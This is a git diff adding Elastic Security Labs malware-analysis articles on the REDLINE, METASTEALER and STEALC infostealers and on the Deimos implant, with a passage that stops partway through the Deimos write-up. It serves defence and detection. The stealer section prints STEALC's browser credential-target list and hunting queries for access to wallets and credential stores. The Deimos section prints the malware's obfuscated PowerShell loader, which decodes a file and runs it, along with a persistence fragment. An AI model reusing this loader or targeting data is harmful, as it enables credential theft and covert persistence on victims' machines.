+- [https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/](https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/)
+- [https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/globally_distributed_stealers.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/globally_distributed_stealers.md
new file mode 100644
index 0000000000000..65a42ae95c13b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/globally_distributed_stealers.md
@@ -0,0 +1,255 @@
+---
+title: "Globally distributed stealers"
+slug: "globally-distributed-stealers"
+date: "2024-05-24"
+description: "This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly."
+author:
+  - slug: salim-bitam
+  - slug: daniel-stepanic
+  - slug: terrance-dejesus
+  - slug: samir-bousseaden
+image: "Security Labs Images 25.jpg"
+category:
+  - slug: malware-analysis
+---
+
+## Introduction
+
+This article describes our analysis of the top Windows malware stealer families that we’ve identified, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly. Additionally, we’ll examine our unique telemetry to offer insights about the current volume associated with these prevalent malware stealer families.
+
+Mitigating this kind of covert threat requires a multi-faceted approach consistent with defense-in-depth principles. We will likewise describe various techniques for detection, including the use of ES|QL hunting queries and Yara rules which empower organizations to proactively defend against them.
+
+## Telemetry overview
+
+The telemetry data showcased in this article encompasses insights gathered from both internal and external sources, providing a comprehensive understanding of threat activity.
+
+Notably, between 2022 and 2023, REDLINE emerged as the most prevalent malware in the wild, closely trailed by AGENT TESLA, VIDAR, and then STEALC. It's worth highlighting that this period marked the debut of STEALC in the wild, indicative of evolving threat landscapes.
+
+In the subsequent time frame, spanning from 2023 to 2024, there was a notable spike in AGENT TESLA activity, followed by REDLINE, STEALC, and VIDAR, reflecting shifting trends in malware prevalence and distribution.
+
+![Telemetry data May 2023 - May 2024](/assets/images/globally-distributed-stealers/image6.png)
+Elastic telemetry data May 2023 - May 2024
+
+Despite fluctuations in general malware prevalence, AGENT TESLA has consistently maintained its position as a prominent threat. This enduring dominance can be attributed to several factors, including its relatively low price point and enticing capabilities, which appeal to a wide range of threat actors, particularly those operating with limited resources or expertise.
+
+A noteworthy observation is that due to METASTEALER’s foundation on REDLINE, certain METASTEALER samples may inadvertently fall under the categorization of REDLINE.
+
+![METASTEALER triggering REDLINE signatures](/assets/images/globally-distributed-stealers/image5.png)
+
+## Top stealers overview
+
+### REDLINE (REDLINE STEALER)
+
+[REDLINE](https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer) made its debut in the threat landscape in 2020, leveraging email as its initial distribution method; it operates on a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Its affordability and availability in underground forums have contributed to its popularity among cybercriminals.
+
+The latest operations of REDLINE involve multiple infection vectors, including email phishing, malicious websites hosting seemingly legitimate applications, and social engineering tactics. Our researchers analyzed a recent sample [reported by vx-underground](https://x.com/vxunderground/status/1634713832974172167) indicating a campaign targeting engineers on the freelancing platform Fiverr. This tactic poses significant risks, potentially leading to the compromise of companies through unsuspecting freelancers.
+
+REDLINE is built on the .NET framework, which provides it with portability and ease of implementation. It has a variety of functionalities aimed at gathering vital system information and extracting sensitive data:
+
+ - System information acquisition:
+  - Collects essential system details such as UserName, Language, and Time Zone
+  - Retrieves hardware specifics including processor and graphic card information
+  - Monitors running processes and identifies installed browsers
+ - Data extraction:
+  - Targets browser data repositories, extracting saved passwords, credit card details, cookies, and auto-fill entries
+  - Procures VPN login credentials for unauthorized access
+  - Logs user credentials and chat histories from platforms like Discord and Telegram
+  - Identifies and steals cryptocurrency wallets, potentially compromising valuable digital assets:
+
+![REDLINE collecting system information](/assets/images/globally-distributed-stealers/image13.png)
+
+REDLINE uses a string obfuscation technique to hinder analysis and evade detection based on strings like yara by dynamically constructing the strings at runtime from an array of characters:
+
+![REDLINE string obfuscation](/assets/images/globally-distributed-stealers/image4.png)
+
+Its configuration is structured within a static class, containing four public fields:  ```IP```,  ```ID```, ```Message```, and an XOR Key. The ```IP``` and ```ID``` fields contents are encrypted using XOR encryption and then encoded in base64 as depicted below:
+ 
+![REDLINE's configuration](/assets/images/globally-distributed-stealers/image3.png)
+
+### METASTEALER
+
+[METASTEALER](https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer) emerged in 2022, initially advertised as a derivative of REDLINE, with additional features; our malware analysts recently encountered a sample of METASTEALER within a campaign masquerading as Roblox, previously [reported by CERT as Orange Polska](https://x.com/CERT_OPL/status/1767191320790024484). 
+
+METASTEALER is primarily developed using the .NET framework, facilitating its compatibility with Windows environments and enabling ease of implementation. Certain versions employ obfuscation methods, including obscuring the control flow of the malware and making it more challenging to detect or analyze.
+
+This METASTEALER sample utilizes the [AGILE.NET](https://www.secureteam.net/) obfuscator, specifically its proxy call obfuscation method. This technique is used to conceal the direct invocation of an original function by introducing an additional layer of abstraction. Instead of directly invoking the function, AGILE.NET generates a proxy method that then invokes the original function. This added complexity makes it more challenging for code analysts to discern the sequence of actions.
+
+![METASTEALER's obfuscation](/assets/images/globally-distributed-stealers/image9.png)
+
+Looking at the code above, we can see the method `Delegate11.smethod_0` calls a `Delegate11.delegate11_0` which is not initialized, introducing ambiguity during static analysis as analysts cannot determine which method will actually be executed.
+
+![METASTEALER initializing the delegate](/assets/images/globally-distributed-stealers/image14.png)
+
+At runtime, the malware will initialize the delegate. by calling the method `Class4.smethod_13` in the constructor of `Delegate11` class, this method constructs a dictionary of token values, where each key represents the token value of a delegate (e.g., ```0x040002DE```), and its corresponding value represents the token of the original method to be executed. This dictionary is constructed from a sequence of bytes stored in the binary, enabling dynamic resolution of method invocations during runtime.
+
+Following this, it will generate a dynamic method for the delegate and execute it using the `smethod_0` function.
+
+![METASTEALER generating delegates dynamic method](/assets/images/globally-distributed-stealers/image8.png)
+
+![METASTEALER checking for debuggers](/assets/images/globally-distributed-stealers/image7.png)
+
+All the important strings in the configuration, like the C2 IP address and port, are encrypted. The malware has a class called `Strings` that is called at the start of execution to decrypt all the strings at once, a process involving a combination of Base64 encoding, XOR decryption, and AES CBC decryption.
+
+Initially, the AES parameters, such as the ```AES KEY``` and ```AES IV```, undergo decryption. In the provided example, the ```AES KEY``` and ```AES IV``` are first base64 decoded. Subsequently, they are subjected to XOR decryption using a predetermined XOR key, followed by two consecutive base64 decoding steps.
+
+![Encrypted AES parameters](/assets/images/globally-distributed-stealers/image1.png)
+
+The Strings class holds byte arrays that are decrypted using AES CBC after being reversed, and then appended to the **Strings.Array** list. Later, when the malware requires specific strings, it accesses them by indexing this list. For example **String.get(6)**.
+
+### STEALC
+
+A recent major player in the stealer space [discovered](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/) by Sekoia in February 2023 is the [STEALC](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc) family. This malware was first advertised in an underground forum in January 2023 where the developer mentioned a major dependency on existing families such as VIDAR, RACOON, and REDLINE. Since this timeframe, our team has observed new STEALC samples daily showing signs of popularity and adoption by cybercriminals.
+
+STEALC is implemented in C and includes features like dynamic imports, string obfuscation, and various anti-analysis checks prior to activating its data-stealing capabilities. In order to protect the binary and its core features, STEALC encrypts its strings using a combination of Base64 + RC4 using a hardcoded key embedded in each sample.
+
+![Embedded RC4 key and encrypted strings within STEALC](/assets/images/globally-distributed-stealers/image10.png)
+
+There are 6 separate functions used for anti-analysis/anti-sandbox checks within STEALC. Based on the number of processors, STEALC will terminate itself if the active processor count is less than 2.
+
+![Retrieve number of processors](/assets/images/globally-distributed-stealers/image2.png)
+
+STEALC performs a sandbox/emulation test using a more obscure Windows API (`VirtualAllocExNuma`) to allocate a large amount of memory. If the API is not implemented, the process will terminate.
+
+![API check using VirtualAllocExNuma](/assets/images/globally-distributed-stealers/image15.png)
+
+The malware performs another sandbox check by reading values from `GlobalMemoryStatusEx`. After a byte shift against the collected attributes of the physical memory, if the value is less than ```0x457``` the sample will terminate. 
+
+The malware will stop execution if the language identifier matches one of the following LangIDs:
+ - Russian_Russia  (```0x419```)
+ - Ukrainian_Ukraine  (```0x422```)
+ - Belarusian_Belarus (```0x423```)
+ - Kazakh_Kazakhstan (```0x43f```)
+ - Uzbek_Latin__Uzbekistan (```0x443```)
+
+STEALC also incorporates the Microsoft Defender emulation check, we have observed this in many stealers such as seen in [LOBSHOT](https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware). STEALC will terminate if the following hard-coded values match inside Microsoft Defender’s emulation layer with the username ```JohnDoe``` and computer name of ```HAL9TH```.
+
+![Microsoft Defender emulation check using computer name and username](/assets/images/globally-distributed-stealers/image12.png)
+
+One of the more impactful anti-analysis checks that comes with STEALC is an expiration date. This unique value gets placed into the malware’s config to ensure that the stealer won’t execute after a specific date set by the builder. This allows the malware to keep a lower profile by using shorter turnarounds in campaigns and limiting the execution in sandbox environments.
+
+#### STEALC - Execution flow
+
+After its initial execution, STEALC will send the initial hardware ID of the machine and receive a configuration from the C2 server:
+
+```
+f960cc969e79d7b100652712b439978f789705156b5a554db3acca13cb298050efa268fb|done|tested.file|1|1|1|1|1|1|1|1|
+```
+
+After this request, it will send multiple requests to receive an updated list of targeted browsers and targeted browser extensions. Below is an example of the browser configuration, this contains the targeted directory path where the sensitive data is stored.
+
+```
+Google Chrome|\Google\Chrome\User Data|chrome|chrome.exe|Google Chrome Canary|\Google\Chrome SxS\User Data|chrome|chrome.exe|Chromium|\Chromium\User Data|chrome|chrome.exe|Amigo|\Amigo\User Data|chrome|0|Torch|\Torch\User Data|chrome|0|Vivaldi|\Vivaldi\User Data|chrome|vivaldi.exe|Comodo Dragon|\Comodo\Dragon\User Data|chrome|0|EpicPrivacyBrowser|\Epic Privacy Browser\User Data|chrome|0|CocCoc|\CocCoc\Browser\User Data|chrome|0|Brave|\BraveSoftware\Brave-Browser\User Data|chrome|brave.exe|Cent Browser|\CentBrowser\User Data|chrome|0|7Star|\7Star\7Star\User Data|chrome|0|Chedot Browser|\Chedot\User Data|chrome|0|Microsoft Edge|\Microsoft\Edge\User Data|chrome|msedge.exe|360 Browser|\360Browser\Browser\User Data|chrome|0|QQBrowser|\Tencent\QQBrowser\User Data|chrome|0|CryptoTab|\CryptoTab Browser\User Data|chrome|browser.exe|Opera Stable|\Opera Software|opera|opera.exe|Opera GX Stable|\Opera Software|opera|opera.exe|Mozilla Firefox|\Mozilla\Firefox\Profiles|firefox|0|Pale Moon|\Moonchild Productions\Pale Moon\Profiles|firefox|0|Opera Crypto Stable|\Opera Software|opera|opera.exe|Thunderbird|\Thunderbird\Profiles|firefox|0|
+```
+
+At this point, STEALC will then collect a broad range of victim information. This information is then formatted, Base64 encoded, and then sent to the C2 server over POST requests using form data fields. 
+ - Hardware ID
+ - Windows OS product info
+ - Processor / RAM information
+ - Username / computername
+ - Local system time / time zone / locale of victim
+ - Keyboard layout
+ - Battery check (used to determine if laptop or not)
+ - Desktop resolution, display info
+ - Installed programs, running processes
+
+For the stealing component, STEALC leverages the received configurations in order to collect various valuable information including:
+ - Browser cookies
+ - Login data
+ - Web data
+ - History
+ - Cryptocurrency wallets
+
+STEALC also offers other various configuration options including:
+ - Telegram data
+ - Discord
+ - Tox
+ - Pidgin
+ - Steam
+ - Outlook emails
+
+|  | RedLine Stealer | Meta Stealer | Stealc |
+| --- | --- | --- | --- |
+| First time seen in the wild | 2020 | 2022 | 2023 |
+| Source Language | C# | C# | C |
+| Average size (unpacked) | 253 KB | 278 KB | 107 KB |
+| String obfuscation? Algo? | Yes | Yes | Yes (custom RC4 + base64) |
+
+
+## Detection
+
+To fully leverage detection capabilities listed below for these threats with Elastic Security, it is essential to integrate [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) and [Windows](https://docs.elastic.co/en/integrations/windows).
+
+ - [Connection to WebService by an Unsigned Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_an_unsigned_binary.toml)
+ - [Connection to WebService by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml)
+ - [Suspicious DNS Query from Mounted Virtual Disk](https://github.com/elastic/endpoint-rules/blob/main/rules/command_and_control_execution_wevsvc_from_virtual_disk.toml)
+ - [Suspicious Access to Web Browser Credential Stores](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_suspicious_access_to_web_browser_credential_stores.toml)
+ - [Web Browser Credential Access via Unsigned Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unsigned_process.toml)
+ - [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml)
+ - [Failed Access Attempt to Web Browser Files](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_failed_access_attempt_to_web_browser_files.toml)
+ - [Web Browser Credential Access via Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unusual_process.toml)
+
+### ES|QL queries
+The following list of hunts and detection queries can be used to detect stealers activities:
+
+- Identifies untrusted or unsigned executables making DNS requests to Telegram or Discord domains, which may indicate command-and-control communication attempts.
+  ``` sql
+  from logs-endpoint*
+  | where (process.code_signature.trusted == false or process.code_signature.exists == false)
+  | where dns.question.name in ("api.telegram.com", "cdn.discordapp.com",
+                                  "discordapp.com", "discord.com","discord.gg","cdn.discordapp.com")
+  | stats executable_count = count(*) by process.executable, process.name, dns.question.name
+  | sort executable_count desc
+  ```
+
+- Detects suspicious activies targeting crypto wallets files and configurations stored on Windows systems.
+
+  ``` sql
+  from logs-endpoint.events.file-*
+  | where @timestamp > now() - 14 days
+  | where host.os.type == "windows"
+  and event.category == "file"
+  and event.action == "open" 
+  and (
+    file.path rlike """C:\\Users\\.+\\AppData\\Roaming\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*"""
+    or file.path rlike """C:\\ProgramData\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*"""
+  )
+  | keep process.executable, process.name, host.id, file.path, file.name
+  | stats number_hosts = count_distinct(host.id), unique_files = count_distinct(file.name) by process.executable
+  | where number_hosts == 1 and unique_files >= 3
+  | sort number_hosts desc
+  ```
+
+- Monitors access to sensitive browser data, such as cookies, login data, and browsing history, which may indicate information-stealing malware activities.
+
+  ``` sql
+  from logs-endpoint.events.file-*, logs-windows.sysmon_operational-default-*
+  | where @timestamp > now() - 14 days
+  | where host.os.type == "windows"
+  and event.category == "file"
+  and event.action in ("open", "modification")
+  and (
+    file.path rlike "C:\\\\Users\\\\.+\\\\AppData\\\\Local\\\\(Google\\\\Chrome\\\\User Data\\\\.*|Google\\\\Chrome SxS\\\\User Data\\\\.*|Chromium\\\\User Data\\\\.*|Amigo\\\\User Data\\\\.*|Torch\\\\User Data\\\\.*|Vivaldi\\\\User Data\\\\.*|Comodo\\\\Dragon\\\\User Data\\\\.*|Epic Privacy Browser\\\\User Data\\\\.*|CocCoc\\\\Browser\\\\User Data\\\\.*|BraveSoftware\\\\Brave-Browser\\\\User Data\\\\.*|CentBrowser\\\\User Data\\\\.*|7Star\\\\7Star\\\\User Data\\\\.*|Chedot\\\\User Data\\\\.*|Microsoft\\\\Edge\\\\User Data\\\\.*|360Browser\\\\Browser\\\\User Data\\\\.*|Tencent\\\\QQBrowser\\\\User Data\\\\.*|CryptoTab Browser\\\\User Data\\\\.*|Opera Software\\\\Opera Stable\\\\.*|Opera Software\\\\Opera GX Stable\\\\.*)\\\\(Default|Profile \\\\d+)\\\\(Cookies|Login Data|Web Data|History|Bookmarks|Preferences|Visited Links|Network Action Predictor|Top Sites|Favicons|Shortcuts)"
+    or file.path rlike "C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key4.db|cert9.db)"
+    or file.path rlike "C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Moonchild Productions\\\\Pale Moon\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key3.db|cert8.db)"
+    or file.path rlike "C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Thunderbird\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|key4.db|cert9.db)"
+  )
+  | keep process.executable, process.name, event.action, host.id, host.name, file.path, file.name
+  | eval process_path = replace(process.executable, "([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\\.tmp|DX[A-Z0-9]{3,4}\\.tmp|7z[A-Z0-9]{3,5}\\.tmp|[0-9\\.\\-_]{3,})", "")
+  | eval process_path = replace(process_path, "[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\", "C:\\\\users\\\\user\\\\")
+  | eval normalized_file_path = replace(file.path, "[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\", "C:\\\\users\\\\user\\\\")
+  | stats number_hosts = count_distinct(host.id) by process.executable, process.name, event.action, normalized_file_path, file.name, host.name
+  | where number_hosts == 1
+  | sort number_hosts desc
+  ```
+
+### Yara rules
+ - [Windows Trojan MetaStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar)
+ - [Windows Trojan Stealc](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar)
+ - [Windows Trojan RedLineStealer](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RedLineStealer.yar)
+ - [Windows Trojan AgentTesla](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar)
+
+
+## Conclusion
+In conclusion, it's crucial to recognize that these malware threats pose significant risks to both companies and individuals alike. Their affordability makes them accessible not only to sophisticated cybercriminals but also to small-time offenders and script kiddies. This accessibility underscores the democratisation of cybercrime, where even individuals with limited technical expertise can deploy malicious software.
+
+Elastic's comprehensive suite of security features offers organisations and individuals the tools they need to defend against malware attacks effectively. From advanced threat detection to real-time monitoring and response capabilities.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant.md
new file mode 100644
index 0000000000000..e6653ca0aa73b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant.md
@@ -0,0 +1,448 @@
+---
+title: "Going Coast to Coast - Climbing the Pyramid with the Deimos Implant"
+slug: "going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant"
+date: "2022-06-08"
+description: "The Deimos implant was first reported in 2020 and has been in active development; employing advanced analysis countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators."
+author:
+  - slug: andrew-pease
+  - slug: daniel-stepanic
+  - slug: derek-ditch
+image: "blog-security-radar-720x420.png"
+category:
+  - slug: malware-analysis
+---
+
+> - A remote access tool is actively being developed in campaigns beyond the initially reported Jupyter Infostealer, SolarMarker, and Yellow Cockatoo campaigns
+> - The malware employs multiple layers of complex obfuscation and encryption techniques
+> - The malware has incorporated convincing lure files and digitally signed installation executables
+> - The malware is part of intrusion sets that are used to establish an initial foothold and maintain persistence into contested environments
+> - A successful takedown was completed by the Elastic Security team for the observed C2 infrastructure
+
+The Deimos implant is a new, complex form of malware first reported in 2020. This remote access tool is under active development, with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques.
+
+These advanced defensive countermeasures, which also include convincing lure files and digitally signed installation executables, can frustrate identification and analysis. However, the Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant.
+
+This post details the tactics, techniques, and procedures, or TTPs, of the Deimos implant. Our goal is to help security practitioners leverage the Elastic Stack to collect and analyze malware and intrusion data by revealing information about how Deimos works that its creators have attempted to obscure for defensive purposes.
+
+## Overview
+
+The Elastic Intelligence & Analytics team tracks a new strain of the Deimos initial access and persistence implant previously associated with the [Jupyter Infostealer](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1) malware (tracked elsewhere as [Yellow Cockatoo](https://redcanary.com/blog/yellow-cockatoo), and [SolarMarker](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)). This implant has demonstrated a maturation of obfuscation techniques as a result of published research. This indicates that the activity group is actively modifying its codebase to evade detective countermeasures.
+
+The sample we observed was not leveraged as an information stealer. It is an implant that provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection.
+
+The analysis will leverage David Bianco's [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html) analytical model to describe the value of atomic indicators, artifacts, tool-markings, and TTPs to the malware authors and how uncovering them can impact the efficiency of the intrusion sets leveraging this implant. Additionally, we are providing some host-based hunting techniques and detection rules that can be leveraged to identify this implant and others that share similar artifacts and TTPs.
+
+## Details
+
+On August 31, 2021, Elastic observed process injection telemetry that shared techniques with the Jupyter Infostealer as reported by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. As we began analysis and compared the samples we observed to prior research, we identified a change in the way obfuscation was implemented. This change may be the result of several factors, one of which is an attempt by the adversary to bypass or otherwise evade existing defenses or malware analysis.
+
+_Note: As previous versions of this malware have been thoroughly documented, we will focus on newly observed capabilities and functionality._
+
+During dynamic analysis of the malware, we observed behavior similar to that which had been reported elsewhere - namely obfuscation using a litany of runtime-created variables (variables that are unique to each execution), directories, an XOR cipher, and Base64 encoded commands. Below, is an example of the new obfuscation tactics employed by the malware author to hinder analysis. We'll discuss this in detail as we unpack the malware's execution.
+
+```
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$650326ac2b1100c4508b8a700b658ad7='C:\Users\user1\d2e227be5d58955a8d12db18fca5d787\a5fb52fc397f782c691961d23cf5e785\4284a9859ab2184b017070368b4a73cd\89555a8780abdb39d3f1761918c40505\83e4d9dd7a7735a516696a49efcc2269\d1c086bb3efeb05d8098a20b80fc3c1a\650326ac2b1100c4508b8a700b658ad7';$1e3dadee7a4b45213f674cb23b07d4b0='hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX';$d6ffa847bb31b563e9b7b08aad22d447=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7;for($i=0;$i -lt $d6ffa847bb31b563e9b7b08aad22d447.count;)\{for($j=0;$j -lt $1e3dadee7a4b45213f674cb23b07d4b0.length;$j++)\{$d6ffa847bb31b563e9b7b08aad22d447[$i]=$d6ffa847bb31b563e9b7b08aad22d447[$i] -bxor $1e3dadee7a4b45213f674cb23b07d4b0[$j];$i++;if($i -ge $d6ffa847bb31b563e9b7b08aad22d447.count)\{$j=$1e3dadee7a4b45213f674cb23b07d4b0.length\}\}\};$d6ffa847bb31b563e9b7b08aad22d447=[System.Text.Encoding]::UTF8.GetString($d6ffa847bb31b563e9b7b08aad22d447);iex $d6ffa847bb31b563e9b7b08aad22d447;"
+```
+
+_Figure 1: PowerShell executed by malware installer_
+
+The sample we observed created a Base64-encoded file nested several subdirectories deep in the %USERPROFILE% directory and referenced this file using a runtime variable in the PowerShell script ($650326ac2b1100c4508b8a700b658ad7 in our sample). Once this encoded file was read by PowerShell, it is deleted as shown in Figure 2. Other published research observed the Base64 string within the PowerShell command which made it visible during execution. This shows an adaptation of the obfuscation techniques leveraged by the malware authors in response to reports published by security researchers.
+
+```
+FromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7
+```
+
+_Figure 2: Base64 encoded file read and then deleted_
+
+Additionally, there was the inclusion of another variable ($1e3dadee7a4b45213f674cb23b07d4b0 in our example) with a value of hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX. By deobfuscating the PowerShell command, we determined that this value was the XOR key used to decrypt the value of the 650326ac2b1100c4508b8a700b658ad7 file. Now that we had the location of the Base64 encoded file and the ability to decrypt it, we needed to prevent it from being deleted.
+
+To do this, we leveraged the [FileDelete](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-23-filedelete-file-delete-archived) event configuration for Sysmon. By default, this creates a directory in the "C:\Sysmon" directory and then places all deleted files (named by the file MD5 + SHA256 hashes + 33 0's + extension) in that folder. This directory is only available to the SYSTEM user. We used [PSExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) to access the folder (psexec -sid cmd). The file contained a single-line Base64-encoded string.
+
+As we observed in the PowerShell above, the contents are protected using an XOR cipher, but a cipher we have the key for. Using the command-line tools [base64](https://linux.die.net/man/1/base64) and [xortool](https://github.com/hellman/xortool), we're able to decode and decrypt the file:
+
+- base64
+  - -D - use the base64 program to decode
+  - -i - the input file to be decoded
+  - -o - the output file to save the decoded content
+- xortool-xor
+  - -r - the XOR cipher key
+  - -f - the file that is XOR encrypted
+  - \\> - output the decrypted file
+
+```
+base64 -D -i 650326ac2b1100c4508b8a700b658ad7.encoded \
+-o 650326ac2b1100c4508b8a700b658ad7.decoded
+
+xortool-xor -r hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX \
+-f 650326ac2b1100c4508b8a700b658ad7.decoded \
+\> 650326ac2b1100c4508b8a700b658ad7.xor
+```
+
+_Figure 3: Decrypting the XOR'd Base64 encoded file_
+
+This resulted in another obfuscated file that started with an XOR'd Base64-encoded variable and ended with more PowerShell.
+
+```
+$adab58383614f8be4ed9d27508c2b='FTDSclNHUTdlaXBxnKdZa9pUUW9iakpFGDBaelBHbE9mbTVZYlVFbWIxZ...
+
+...CReaTEShorTcuT($ENV:APpDATa+'\m'+'IcR'+'OSO'+'Ft'+'\w'+'Ind'+'OW'+'S\'+'sT'+'ARt'+' ME
+'+'nU'+'\pr'+'OGR'+'aMS\'+'sT'+'ART'+'uP'+'\a44f066dfa44db9fba953a982d48b.LNk');$a78b0ce650249ba927e4cf43d02e5.tARGETpaTh=$a079109a9a641e8b862832e92c1c7+'\'+$a7f0a120130474bdc120c5f
+13775a;$a78b0ce650249ba927e4cf43d02e5.WInDoWSTYLE=7;$a78b0ce650249ba927e4cf43d02e5.sAvE();IEx $a54b6e0f7564f4ad0bf41a1875401;
+```
+
+_Figure 4: Final obfuscated file (truncated)_
+
+Following the same process as before, we identified the XOR key (which may have been trying to use an = sign to appear to look like it was Base64) and decoded the file.
+
+```
+XjBrPGQ7aipqcXYkbTQobjJEX0ZzPGlOfm5YbUEmb1dBazZ0RlpCa2hLQks8eXNxK3tsRHpZVmtmUU9mb31jaVVuMXUxUGk/e0tDa0QmXjA8U0ZAckhgNl5vX1deQGBad2peTyZvVUByaSk2XlBJMTxAdEtnT0B3fnBJPCtfe2tvV0d7P3Y0V2BaeXQ9PmhtI3ZaVHc3I2tGcm5IRmlmUTV8bXpxXlg/cyo8XyFwXyt5QmwjOChQZ09aPXxqaS1hfmxDK3U=
+```
+
+_Figure 5: XOR cipher key_
+
+This process yielded a .NET DLL file that creates an implant tracking ID and files used for persistence (more about the tracking ID is in the Analysis - Initial Access section).
+
+```
+adab58383614f8be4ed9d27508c2b: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
+```
+
+_Figure 6: .NET DLL file type_
+
+The DLL calls itself Mars.Deimos and correlates to previous research by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. The particular samples that we've observed utilize the .NET hardening tool [Dotfuscator CE 6.3.0](https://www.preemptive.com/dotfuscator/ce/docs/help/index.html) to hinder malware analysis.
+
